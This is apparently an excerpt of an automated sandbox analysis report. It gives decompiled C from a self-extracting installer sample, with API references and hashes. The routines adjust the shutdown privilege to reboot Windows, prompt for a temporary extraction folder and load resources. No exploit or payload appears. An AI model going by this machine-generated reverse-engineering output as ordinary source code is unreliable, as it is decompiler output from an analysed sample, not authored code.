                                                                                                                                                                                                      						if( *0x3e9a40 != 0) {
                                                                                                                                                                                                      							_pop(_t30);
                                                                                                                                                                                                      							_t44 = _t46;
                                                                                                                                                                                                      							_t13 =  *0x3e8004; // 0x59d037e4
                                                                                                                                                                                                      							_v8 = _t13 ^ _t46;
                                                                                                                                                                                                      							_push(_t38);
                                                                                                                                                                                                      							if(OpenProcessToken(GetCurrentProcess(), 0x28,  &_v28) != 0) {
                                                                                                                                                                                                      								LookupPrivilegeValueA(0, "SeShutdownPrivilege",  &(_v24.Privileges));
                                                                                                                                                                                                      								_v24.PrivilegeCount = 1;
                                                                                                                                                                                                      								_v12 = 2;
                                                                                                                                                                                                      								_t21 = AdjustTokenPrivileges(_v28, 0,  &_v24, 0, 0, 0);
                                                                                                                                                                                                      								CloseHandle(_v28);
                                                                                                                                                                                                      								_t41 = _t41;
                                                                                                                                                                                                      								_push(0);
                                                                                                                                                                                                      								if(_t21 != 0) {
                                                                                                                                                                                                      									if(ExitWindowsEx(2, ??) != 0) {
                                                                                                                                                                                                      										_t25 = 1;
                                                                                                                                                                                                      									} else {
                                                                                                                                                                                                      										_t37 = 0x4f7;
                                                                                                                                                                                                      										goto L3;
                                                                                                                                                                                                      									}
                                                                                                                                                                                                      								} else {
                                                                                                                                                                                                      									_t37 = 0x4f6;
                                                                                                                                                                                                      									goto L4;
                                                                                                                                                                                                      								}
                                                                                                                                                                                                      							} else {
                                                                                                                                                                                                      								_t37 = 0x4f5;
                                                                                                                                                                                                      								L3:
                                                                                                                                                                                                      								_push(0);
                                                                                                                                                                                                      								L4:
                                                                                                                                                                                                      								_push(0x10);
                                                                                                                                                                                                      								_push(0);
                                                                                                                                                                                                      								_push(0);
                                                                                                                                                                                                      								E003E44B9(0, _t37);
                                                                                                                                                                                                      								_t25 = 0;
                                                                                                                                                                                                      							}
                                                                                                                                                                                                      							_pop(_t40);
                                                                                                                                                                                                      							return E003E6CE0(_t25, _t30, _v8 ^ _t44, _t37, _t40, _t41);
                                                                                                                                                                                                      						} else {
                                                                                                                                                                                                      							_t28 = ExitWindowsEx(2, 0);
                                                                                                                                                                                                      							goto L16;
                                                                                                                                                                                                      						}
                                                                                                                                                                                                      					} else {
                                                                                                                                                                                                      						_t37 = 0x522;
                                                                                                                                                                                                      						_t28 = E003E44B9(0, 0x522, 0x3e1140, 0, 0x40, 4);
                                                                                                                                                                                                      						if(_t28 != 6) {
                                                                                                                                                                                                      							goto L16;
                                                                                                                                                                                                      						} else {
                                                                                                                                                                                                      							goto L14;
                                                                                                                                                                                                      						}
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      				} else {
                                                                                                                                                                                                      					__eax = E003E1EA7(__ecx);
                                                                                                                                                                                                      					if(__eax != 2) {
                                                                                                                                                                                                      						L16:
                                                                                                                                                                                                      						return _t28;
                                                                                                                                                                                                      					} else {
                                                                                                                                                                                                      						goto L12;
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      			}

















                                                                                                                                                                                                      0x003e1f90
                                                                                                                                                                                                      0x003e1f90
                                                                                                                                                                                                      0x003e1f93
                                                                                                                                                                                                      0x003e1f98
                                                                                                                                                                                                      0x003e1fa4
                                                                                                                                                                                                      0x003e1fa7
                                                                                                                                                                                                      0x003e1fc5
                                                                                                                                                                                                      0x003e1fcd
                                                                                                                                                                                                      0x003e1fdb
                                                                                                                                                                                                      0x003e1ee5
                                                                                                                                                                                                      0x003e1eea
                                                                                                                                                                                                      0x003e1ef1
                                                                                                                                                                                                      0x003e1ef4
                                                                                                                                                                                                      0x003e1f0c
                                                                                                                                                                                                      0x003e1f2e
                                                                                                                                                                                                      0x003e1f3a
                                                                                                                                                                                                      0x003e1f46
                                                                                                                                                                                                      0x003e1f4d
                                                                                                                                                                                                      0x003e1f58
                                                                                                                                                                                                      0x003e1f60
                                                                                                                                                                                                      0x003e1f61
                                                                                                                                                                                                      0x003e1f62
                                                                                                                                                                                                      0x003e1f75
                                                                                                                                                                                                      0x003e1f80
                                                                                                                                                                                                      0x003e1f77
                                                                                                                                                                                                      0x003e1f77
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x003e1f77
                                                                                                                                                                                                      0x003e1f64
                                                                                                                                                                                                      0x003e1f64
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x003e1f64
                                                                                                                                                                                                      0x003e1f0e
                                                                                                                                                                                                      0x003e1f0e
                                                                                                                                                                                                      0x003e1f13
                                                                                                                                                                                                      0x003e1f13
                                                                                                                                                                                                      0x003e1f14
                                                                                                                                                                                                      0x003e1f14
                                                                                                                                                                                                      0x003e1f16
                                                                                                                                                                                                      0x003e1f17
                                                                                                                                                                                                      0x003e1f1a
                                                                                                                                                                                                      0x003e1f1f
                                                                                                                                                                                                      0x003e1f1f
                                                                                                                                                                                                      0x003e1f86
                                                                                                                                                                                                      0x003e1f8f
                                                                                                                                                                                                      0x003e1fcf
                                                                                                                                                                                                      0x003e1fd3
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x003e1fd3
                                                                                                                                                                                                      0x003e1fa9
                                                                                                                                                                                                      0x003e1fb4
                                                                                                                                                                                                      0x003e1fbb
                                                                                                                                                                                                      0x003e1fc3
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x003e1fc3
                                                                                                                                                                                                      0x003e1f9a
                                                                                                                                                                                                      0x003e1f9a
                                                                                                                                                                                                      0x003e1fa2
                                                                                                                                                                                                      0x003e1fd9
                                                                                                                                                                                                      0x003e1fda
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x003e1fa2

                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • GetCurrentProcess.KERNEL32(00000028,?,?), ref: 003E1EFB
                                                                                                                                                                                                      • OpenProcessToken.ADVAPI32(00000000), ref: 003E1F02
                                                                                                                                                                                                      • ExitWindowsEx.USER32(00000002,00000000), ref: 003E1FD3
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000001.00000002.436245318.00000000003E1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000001.00000002.436227049.00000000003E0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000001.00000002.436296879.00000000003E8000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000001.00000002.436318201.00000000003EA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000001.00000002.436318201.00000000003EC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_3e0000_shS06Up82.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Process$CurrentExitOpenTokenWindows
                                                                                                                                                                                                      • String ID: SeShutdownPrivilege
                                                                                                                                                                                                      • API String ID: 2795981589-3733053543
                                                                                                                                                                                                      • Opcode ID: 35237957b774e024fc3975c2ea3239094e68991c622726173d644465776f58e4
                                                                                                                                                                                                      • Instruction ID: bee4d053e28c39f43ee1336e5b894f0c30ea9af819bf811d3110f82aec0feae2
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 35237957b774e024fc3975c2ea3239094e68991c622726173d644465776f58e4
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 0721D671B40295AADB325BA39C4AFBF77BCEB85B11F110319FA02DA1C1D7749C0296A1
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      C-Code - Quality: 100%
                                                                                                                                                                                                      			E003E6CF0(char _a4) {
                                                                                                                                                                                                      
                                                                                                                                                                                                      				SetUnhandledExceptionFilter(0);
                                                                                                                                                                                                      				_t1 =  &_a4; // 0x3e6e26
                                                                                                                                                                                                      				UnhandledExceptionFilter( *_t1);
                                                                                                                                                                                                      				return TerminateProcess(GetCurrentProcess(), 0xc0000409);
                                                                                                                                                                                                      			}



                                                                                                                                                                                                      0x003e6cf7
                                                                                                                                                                                                      0x003e6cfd
                                                                                                                                                                                                      0x003e6d00
                                                                                                                                                                                                      0x003e6d19

                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • SetUnhandledExceptionFilter.KERNEL32(00000000,?,003E6E26,003E1000), ref: 003E6CF7
                                                                                                                                                                                                      • UnhandledExceptionFilter.KERNEL32(&n>,?,003E6E26,003E1000), ref: 003E6D00
                                                                                                                                                                                                      • GetCurrentProcess.KERNEL32(C0000409,?,003E6E26,003E1000), ref: 003E6D0B
                                                                                                                                                                                                      • TerminateProcess.KERNEL32(00000000,?,003E6E26,003E1000), ref: 003E6D12
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000001.00000002.436245318.00000000003E1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000001.00000002.436227049.00000000003E0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000001.00000002.436296879.00000000003E8000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000001.00000002.436318201.00000000003EA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000001.00000002.436318201.00000000003EC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_3e0000_shS06Up82.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: ExceptionFilterProcessUnhandled$CurrentTerminate
                                                                                                                                                                                                      • String ID: &n>
                                                                                                                                                                                                      • API String ID: 3231755760-4187928770
                                                                                                                                                                                                      • Opcode ID: 5bbf848b3d8e7a7aaf280cc9b2aa4188385ce994fb7b41314d922ae85ef32888
                                                                                                                                                                                                      • Instruction ID: 983f66e79ce0059eec1466fb001d39bc02d57f2e5ac55bfdb944be9ce7285f12
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 5bbf848b3d8e7a7aaf280cc9b2aa4188385ce994fb7b41314d922ae85ef32888
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 4FD01232004988BBDB222BF1EC4CA593F2CFB49313F454104F31E8A0A0CB326451CB53
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      C-Code - Quality: 76%
                                                                                                                                                                                                      			E003E3210(struct HWND__* _a4, intOrPtr _a8, intOrPtr _a12) {
                                                                                                                                                                                                      				void* __edi;
                                                                                                                                                                                                      				void* _t6;
                                                                                                                                                                                                      				void* _t10;
                                                                                                                                                                                                      				int _t20;
                                                                                                                                                                                                      				int _t21;
                                                                                                                                                                                                      				int _t23;
                                                                                                                                                                                                      				char _t24;
                                                                                                                                                                                                      				long _t25;
                                                                                                                                                                                                      				int _t27;
                                                                                                                                                                                                      				int _t30;
                                                                                                                                                                                                      				void* _t32;
                                                                                                                                                                                                      				int _t33;
                                                                                                                                                                                                      				int _t34;
                                                                                                                                                                                                      				int _t37;
                                                                                                                                                                                                      				int _t38;
                                                                                                                                                                                                      				int _t39;
                                                                                                                                                                                                      				void* _t42;
                                                                                                                                                                                                      				void* _t46;
                                                                                                                                                                                                      				CHAR* _t49;
                                                                                                                                                                                                      				void* _t58;
                                                                                                                                                                                                      				void* _t63;
                                                                                                                                                                                                      				struct HWND__* _t64;
                                                                                                                                                                                                      
                                                                                                                                                                                                      				_t64 = _a4;
                                                                                                                                                                                                      				_t6 = _a8 - 0x10;
                                                                                                                                                                                                      				if(_t6 == 0) {
                                                                                                                                                                                                      					_push(0);
                                                                                                                                                                                                      					L38:
                                                                                                                                                                                                      					EndDialog(_t64, ??);
                                                                                                                                                                                                      					L39:
                                                                                                                                                                                                      					__eflags = 1;
                                                                                                                                                                                                      					return 1;
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      				_t42 = 1;
                                                                                                                                                                                                      				_t10 = _t6 - 0x100;
                                                                                                                                                                                                      				if(_t10 == 0) {
                                                                                                                                                                                                      					E003E43D0(_t64, GetDesktopWindow());
                                                                                                                                                                                                      					SetWindowTextA(_t64, "cent");
                                                                                                                                                                                                      					SendDlgItemMessageA(_t64, 0x835, 0xc5, 0x103, 0);
                                                                                                                                                                                                      					__eflags =  *0x3e9a40 - _t42; // 0x3
                                                                                                                                                                                                      					if(__eflags == 0) {
                                                                                                                                                                                                      						EnableWindow(GetDlgItem(_t64, 0x836), 0);
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      					L36:
                                                                                                                                                                                                      					return _t42;
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      				if(_t10 == _t42) {
                                                                                                                                                                                                      					_t20 = _a12 - 1;
                                                                                                                                                                                                      					__eflags = _t20;
                                                                                                                                                                                                      					if(_t20 == 0) {
                                                                                                                                                                                                      						_t21 = GetDlgItemTextA(_t64, 0x835, 0x3e91e4, 0x104);
                                                                                                                                                                                                      						__eflags = _t21;
                                                                                                                                                                                                      						if(_t21 == 0) {
                                                                                                                                                                                                      							L32:
                                                                                                                                                                                                      							_t58 = 0x4bf;
                                                                                                                                                                                                      							_push(0);
                                                                                                                                                                                                      							_push(0x10);
                                                                                                                                                                                                      							_push(0);
                                                                                                                                                                                                      							_push(0);
                                                                                                                                                                                                      							L25:
                                                                                                                                                                                                      							E003E44B9(_t64, _t58);
                                                                                                                                                                                                      							goto L39;
                                                                                                                                                                                                      						}
                                                                                                                                                                                                      						_t49 = 0x3e91e4;
                                                                                                                                                                                                      						do {
                                                                                                                                                                                                      							_t23 =  *_t49;
                                                                                                                                                                                                      							_t49 =  &(_t49[1]);
                                                                                                                                                                                                      							__eflags = _t23;
                                                                                                                                                                                                      						} while (_t23 != 0);
                                                                                                                                                                                                      						__eflags = _t49 - 0x3e91e5 - 3;
                                                                                                                                                                                                      						if(_t49 - 0x3e91e5 < 3) {
                                                                                                                                                                                                      							goto L32;
                                                                                                                                                                                                      						}
                                                                                                                                                                                                      						_t24 =  *0x3e91e5; // 0x3a
                                                                                                                                                                                                      						__eflags = _t24 - 0x3a;
                                                                                                                                                                                                      						if(_t24 == 0x3a) {
                                                                                                                                                                                                      							L21:
                                                                                                                                                                                                      							_t25 = GetFileAttributesA(0x3e91e4);
                                                                                                                                                                                                      							__eflags = _t25 - 0xffffffff;
                                                                                                                                                                                                      							if(_t25 != 0xffffffff) {
                                                                                                                                                                                                      								L26:
                                                                                                                                                                                                      								E003E658A(0x3e91e4, 0x104, 0x3e1140);
                                                                                                                                                                                                      								_t27 = E003E58C8(0x3e91e4);
                                                                                                                                                                                                      								__eflags = _t27;
                                                                                                                                                                                                      								if(_t27 != 0) {
                                                                                                                                                                                                      									__eflags =  *0x3e91e4 - 0x5c;
                                                                                                                                                                                                      									if( *0x3e91e4 != 0x5c) {
                                                                                                                                                                                                      										L30:
                                                                                                                                                                                                      										_t30 = E003E597D(0x3e91e4, 1, _t64, 1);
                                                                                                                                                                                                      										__eflags = _t30;
                                                                                                                                                                                                      										if(_t30 == 0) {
                                                                                                                                                                                                      											L35:
                                                                                                                                                                                                      											_t42 = 1;
                                                                                                                                                                                                      											__eflags = 1;
                                                                                                                                                                                                      											goto L36;
                                                                                                                                                                                                      										}
                                                                                                                                                                                                      										L31:
                                                                                                                                                                                                      										_t42 = 1;
                                                                                                                                                                                                      										EndDialog(_t64, 1);
                                                                                                                                                                                                      										goto L36;
                                                                                                                                                                                                      									}
                                                                                                                                                                                                      									__eflags =  *0x3e91e5 - 0x5c;
                                                                                                                                                                                                      									if( *0x3e91e5 == 0x5c) {
                                                                                                                                                                                                      										goto L31;
                                                                                                                                                                                                      									}
                                                                                                                                                                                                      									goto L30;
                                                                                                                                                                                                      								}
                                                                                                                                                                                                      								_push(0);
                                                                                                                                                                                                      								_push(0x10);
                                                                                                                                                                                                      								_push(0);
                                                                                                                                                                                                      								_push(0);
                                                                                                                                                                                                      								_t58 = 0x4be;
                                                                                                                                                                                                      								goto L25;
                                                                                                                                                                                                      							}
                                                                                                                                                                                                      							_t32 = E003E44B9(_t64, 0x54a, 0x3e91e4, 0, 0x20, 4);
                                                                                                                                                                                                      							__eflags = _t32 - 6;
                                                                                                                                                                                                      							if(_t32 != 6) {
                                                                                                                                                                                                      								goto L35;
                                                                                                                                                                                                      							}
                                                                                                                                                                                                      							_t33 = CreateDirectoryA(0x3e91e4, 0);
                                                                                                                                                                                                      							__eflags = _t33;
                                                                                                                                                                                                      							if(_t33 != 0) {
                                                                                                                                                                                                      								goto L26;
                                                                                                                                                                                                      							}
                                                                                                                                                                                                      							_push(0);
                                                                                                                                                                                                      							_push(0x10);
                                                                                                                                                                                                      							_push(0);
                                                                                                                                                                                                      							_push(0x3e91e4);
                                                                                                                                                                                                      							_t58 = 0x4cb;
                                                                                                                                                                                                      							goto L25;
                                                                                                                                                                                                      						}
                                                                                                                                                                                                      						__eflags =  *0x3e91e4 - 0x5c;
                                                                                                                                                                                                      						if( *0x3e91e4 != 0x5c) {
                                                                                                                                                                                                      							goto L32;
                                                                                                                                                                                                      						}
                                                                                                                                                                                                      						__eflags = _t24 - 0x5c;
                                                                                                                                                                                                      						if(_t24 != 0x5c) {
                                                                                                                                                                                                      							goto L32;
                                                                                                                                                                                                      						}
                                                                                                                                                                                                      						goto L21;
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      					_t34 = _t20 - 1;
                                                                                                                                                                                                      					__eflags = _t34;
                                                                                                                                                                                                      					if(_t34 == 0) {
                                                                                                                                                                                                      						EndDialog(_t64, 0);
                                                                                                                                                                                                      						 *0x3e9124 = 0x800704c7;
                                                                                                                                                                                                      						goto L39;
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      					__eflags = _t34 != 0x834;
                                                                                                                                                                                                      					if(_t34 != 0x834) {
                                                                                                                                                                                                      						goto L36;
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      					_t37 = LoadStringA( *0x3e9a3c, 0x3e8, 0x3e8598, 0x200);
                                                                                                                                                                                                      					__eflags = _t37;
                                                                                                                                                                                                      					if(_t37 != 0) {
                                                                                                                                                                                                      						_t38 = E003E4224(_t64, _t46, _t46);
                                                                                                                                                                                                      						__eflags = _t38;
                                                                                                                                                                                                      						if(_t38 == 0) {
                                                                                                                                                                                                      							goto L36;
                                                                                                                                                                                                      						}
                                                                                                                                                                                                      						_t39 = SetDlgItemTextA(_t64, 0x835, 0x3e87a0);
                                                                                                                                                                                                      						__eflags = _t39;
                                                                                                                                                                                                      						if(_t39 != 0) {
                                                                                                                                                                                                      							goto L36;
                                                                                                                                                                                                      						}
                                                                                                                                                                                                      						_t63 = 0x4c0;
                                                                                                                                                                                                      						L9:
                                                                                                                                                                                                      						E003E44B9(_t64, _t63, 0, 0, 0x10, 0);
                                                                                                                                                                                                      						_push(0);
                                                                                                                                                                                                      						goto L38;
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      					_t63 = 0x4b1;
                                                                                                                                                                                                      					goto L9;
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      				return 0;
                                                                                                                                                                                                      			}

























                                                                                                                                                                                                      0x003e321b
                                                                                                                                                                                                      0x003e321e
                                                                                                                                                                                                      0x003e3221
                                                                                                                                                                                                      0x003e343c
                                                                                                                                                                                                      0x003e343e
                                                                                                                                                                                                      0x003e343f
                                                                                                                                                                                                      0x003e3445
                                                                                                                                                                                                      0x003e3447
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x003e3447
                                                                                                                                                                                                      0x003e3229
                                                                                                                                                                                                      0x003e322a
                                                                                                                                                                                                      0x003e322f
                                                                                                                                                                                                      0x003e33ec
                                                                                                                                                                                                      0x003e33f7
                                                                                                                                                                                                      0x003e3410
                                                                                                                                                                                                      0x003e3416
                                                                                                                                                                                                      0x003e341d
                                                                                                                                                                                                      0x003e342d
                                                                                                                                                                                                      0x003e342d
                                                                                                                                                                                                      0x003e3438
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x003e3438
                                                                                                                                                                                                      0x003e3237
                                                                                                                                                                                                      0x003e3243
                                                                                                                                                                                                      0x003e3243
                                                                                                                                                                                                      0x003e3246
                                                                                                                                                                                                      0x003e32ee
                                                                                                                                                                                                      0x003e32f4
                                                                                                                                                                                                      0x003e32f6
                                                                                                                                                                                                      0x003e33d4
                                                                                                                                                                                                      0x003e33d6
                                                                                                                                                                                                      0x003e33db
                                                                                                                                                                                                      0x003e33dc
                                                                                                                                                                                                      0x003e33de
                                                                                                                                                                                                      0x003e33df
                                                                                                                                                                                                      0x003e3370
                                                                                                                                                                                                      0x003e3372
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x003e3372
                                                                                                                                                                                                      0x003e32fc
                                                                                                                                                                                                      0x003e3301
                                                                                                                                                                                                      0x003e3301
                                                                                                                                                                                                      0x003e3303
                                                                                                                                                                                                      0x003e3304
                                                                                                                                                                                                      0x003e3304
                                                                                                                                                                                                      0x003e330a
                                                                                                                                                                                                      0x003e330d
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x003e3313
                                                                                                                                                                                                      0x003e3318
                                                                                                                                                                                                      0x003e331a
                                                                                                                                                                                                      0x003e3331
                                                                                                                                                                                                      0x003e3332
                                                                                                                                                                                                      0x003e333a
                                                                                                                                                                                                      0x003e333d
                                                                                                                                                                                                      0x003e337c
                                                                                                                                                                                                      0x003e3388
                                                                                                                                                                                                      0x003e338f
                                                                                                                                                                                                      0x003e3394
                                                                                                                                                                                                      0x003e3396
                                                                                                                                                                                                      0x003e33a4
                                                                                                                                                                                                      0x003e33ab
                                                                                                                                                                                                      0x003e33b6
                                                                                                                                                                                                      0x003e33be
                                                                                                                                                                                                      0x003e33c3
                                                                                                                                                                                                      0x003e33c5
                                                                                                                                                                                                      0x003e3435
                                                                                                                                                                                                      0x003e3437
                                                                                                                                                                                                      0x003e3437
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x003e3437
                                                                                                                                                                                                      0x003e33c7
                                                                                                                                                                                                      0x003e33c9
                                                                                                                                                                                                      0x003e33cc
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x003e33cc
                                                                                                                                                                                                      0x003e33ad
                                                                                                                                                                                                      0x003e33b4
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x003e33b4
                                                                                                                                                                                                      0x003e3398
                                                                                                                                                                                                      0x003e3399
                                                                                                                                                                                                      0x003e339b
                                                                                                                                                                                                      0x003e339c
                                                                                                                                                                                                      0x003e339d
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x003e339d
                                                                                                                                                                                                      0x003e334c
                                                                                                                                                                                                      0x003e3351
                                                                                                                                                                                                      0x003e3354
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x003e335c
                                                                                                                                                                                                      0x003e3362
                                                                                                                                                                                                      0x003e3364
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x003e3366
                                                                                                                                                                                                      0x003e3367
                                                                                                                                                                                                      0x003e3369
                                                                                                                                                                                                      0x003e336a
                                                                                                                                                                                                      0x003e336b
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x003e336b
                                                                                                                                                                                                      0x003e331c
                                                                                                                                                                                                      0x003e3323
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x003e3329
                                                                                                                                                                                                      0x003e332b
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x003e332b
                                                                                                                                                                                                      0x003e324c
                                                                                                                                                                                                      0x003e324c
                                                                                                                                                                                                      0x003e324f
                                                                                                                                                                                                      0x003e32c8
                                                                                                                                                                                                      0x003e32ce
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x003e32ce
                                                                                                                                                                                                      0x003e3251
                                                                                                                                                                                                      0x003e3256
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x003e3271
                                                                                                                                                                                                      0x003e3277
                                                                                                                                                                                                      0x003e3279
                                                                                                                                                                                                      0x003e3298
                                                                                                                                                                                                      0x003e329d
                                                                                                                                                                                                      0x003e329f
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x003e32b0
                                                                                                                                                                                                      0x003e32b6
                                                                                                                                                                                                      0x003e32b8
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x003e32be
                                                                                                                                                                                                      0x003e3280
                                                                                                                                                                                                      0x003e3289
                                                                                                                                                                                                      0x003e328e
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x003e328e
                                                                                                                                                                                                      0x003e327b
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x003e327b
                                                                                                                                                                                                      0x00000000

                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • LoadStringA.USER32(000003E8,003E8598,00000200), ref: 003E3271
                                                                                                                                                                                                      • GetDesktopWindow.USER32 ref: 003E33E2
                                                                                                                                                                                                      • SetWindowTextA.USER32(?,cent), ref: 003E33F7
                                                                                                                                                                                                      • SendDlgItemMessageA.USER32(?,00000835,000000C5,00000103,00000000), ref: 003E3410
                                                                                                                                                                                                      • GetDlgItem.USER32(?,00000836), ref: 003E3426
                                                                                                                                                                                                      • EnableWindow.USER32(00000000), ref: 003E342D
                                                                                                                                                                                                      • EndDialog.USER32(?,00000000), ref: 003E343F
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000001.00000002.436245318.00000000003E1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000001.00000002.436227049.00000000003E0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000001.00000002.436296879.00000000003E8000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000001.00000002.436318201.00000000003EA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000001.00000002.436318201.00000000003EC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_3e0000_shS06Up82.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Window$Item$DesktopDialogEnableLoadMessageSendStringText
                                                                                                                                                                                                      • String ID: C:\Users\user\AppData\Local\Temp\IXP001.TMP\$cent
                                                                                                                                                                                                      • API String ID: 2418873061-3212698739
                                                                                                                                                                                                      • Opcode ID: 94080f8a2d60acc89d539c2f63478550049cd07db278004abc23f337ce71cc0c
                                                                                                                                                                                                      • Instruction ID: 1cca8ba28be00bdd3a7c9801e941c5f15628f40b6f23b30491bc338b011fb9c8
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 94080f8a2d60acc89d539c2f63478550049cd07db278004abc23f337ce71cc0c
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 015126303402F0BAEB335B375C8CFBF2A5D9B46B54F514728F245AB5C1CAA49E019762
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      C-Code - Quality: 93%
                                                                                                                                                                                                      			E003E2CAA(struct HINSTANCE__* __ecx, void* __edx, void* __eflags) {
                                                                                                                                                                                                      				signed int _v8;
                                                                                                                                                                                                      				char _v268;
                                                                                                                                                                                                      				void* __ebx;
                                                                                                                                                                                                      				void* __edi;
                                                                                                                                                                                                      				void* __esi;
                                                                                                                                                                                                      				signed int _t13;
                                                                                                                                                                                                      				void* _t20;
                                                                                                                                                                                                      				void* _t23;
                                                                                                                                                                                                      				void* _t27;
                                                                                                                                                                                                      				struct HRSRC__* _t31;
                                                                                                                                                                                                      				intOrPtr _t33;
                                                                                                                                                                                                      				void* _t43;
                                                                                                                                                                                                      				void* _t48;
                                                                                                                                                                                                      				signed int _t65;
                                                                                                                                                                                                      				struct HINSTANCE__* _t66;
                                                                                                                                                                                                      				signed int _t67;
                                                                                                                                                                                                      
                                                                                                                                                                                                      				_t13 =  *0x3e8004; // 0x59d037e4
                                                                                                                                                                                                      				_v8 = _t13 ^ _t67;
                                                                                                                                                                                                      				_t65 = 0;
                                                                                                                                                                                                      				_t66 = __ecx;
                                                                                                                                                                                                      				_t48 = __edx;
                                                                                                                                                                                                      				 *0x3e9a3c = __ecx;
                                                                                                                                                                                                      				memset(0x3e9140, 0, 0x8fc);
                                                                                                                                                                                                      				memset(0x3e8a20, 0, 0x32c);
                                                                                                                                                                                                      				memset(0x3e88c0, 0, 0x104);
                                                                                                                                                                                                      				 *0x3e93ec = 1;
                                                                                                                                                                                                      				_t20 = E003E468F("TITLE", 0x3e9154, 0x7f);
                                                                                                                                                                                                      				if(_t20 == 0 || _t20 > 0x80) {
                                                                                                                                                                                                      					_t64 = 0x4b1;
                                                                                                                                                                                                      					goto L32;
